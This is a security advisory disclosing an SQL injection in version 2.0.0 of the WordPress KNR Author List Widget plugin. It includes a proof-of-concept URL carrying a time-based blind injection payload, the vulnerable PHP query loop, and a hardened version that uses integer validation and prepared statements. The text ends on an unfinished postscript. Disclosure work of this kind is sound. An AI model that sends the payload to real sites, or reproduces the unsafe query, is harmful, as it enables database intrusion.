# Exploit Title: WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability
# Date: 2011-09-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/knr-author-list-widget.zip
# Version: 2.0.0 (tested)
---
PoC
---
http://www.site.com/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
---------------
Vulnerable code
---------------
foreach ($_GET['listItem'] as $position => $item) :
    $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
    $wpdb->query($iterSql);
endforeach;
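
A hardened form of the loop above, as an added example that is not the plugin's or the advisory author's code: both interpolated values ($position and $item) are validated as integers and then bound with $wpdb->prepare(). The function names and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not the plugin's own code; function names are hypothetical.

// Convert the raw listItem parameter into [position, user ID] integer pairs.
// Returns null when any key or value is not a plain integer in range.
function knr_parse_list_items($raw): ?array
{
    if (!is_array($raw)) {
        return null;
    }
    $pairs = [];
    foreach ($raw as $position => $item) {
        $pos = filter_var($position, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
        $id  = filter_var($item, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($pos === false || $id === false) {
            return null; // reject the whole request, do not save a partial order
        }
        $pairs[] = [$pos, $id];
    }
    return $pairs;
}

// Apply the ordering with bound parameters; $wpdb is WordPress's database object.
function knr_save_author_order($wpdb, array $pairs): void
{
    foreach ($pairs as [$pos, $id]) {
        $sql = $wpdb->prepare(
            "UPDATE {$wpdb->users} SET knr_author_order = %d WHERE ID = %d",
            $pos,
            $id
        );
        $wpdb->query($sql);
    }
}

// Constructed sample inputs, run only from the command line (no WordPress needed).
if (PHP_SAPI === 'cli') {
    $samples = [
        'ordinary'   => ['3', '7', '2'],
        'advisory'   => ['-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)'],
        'string key' => ['first' => '5'],
    ];
    foreach ($samples as $name => $raw) {
        printf("%-11s %s\n", $name, json_encode(knr_parse_list_items($raw)));
    }
}
```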
p.s. author has been contacted (no reply yet)
p.p.s. this is a comment found here from the author of this same vulnerable plugin:
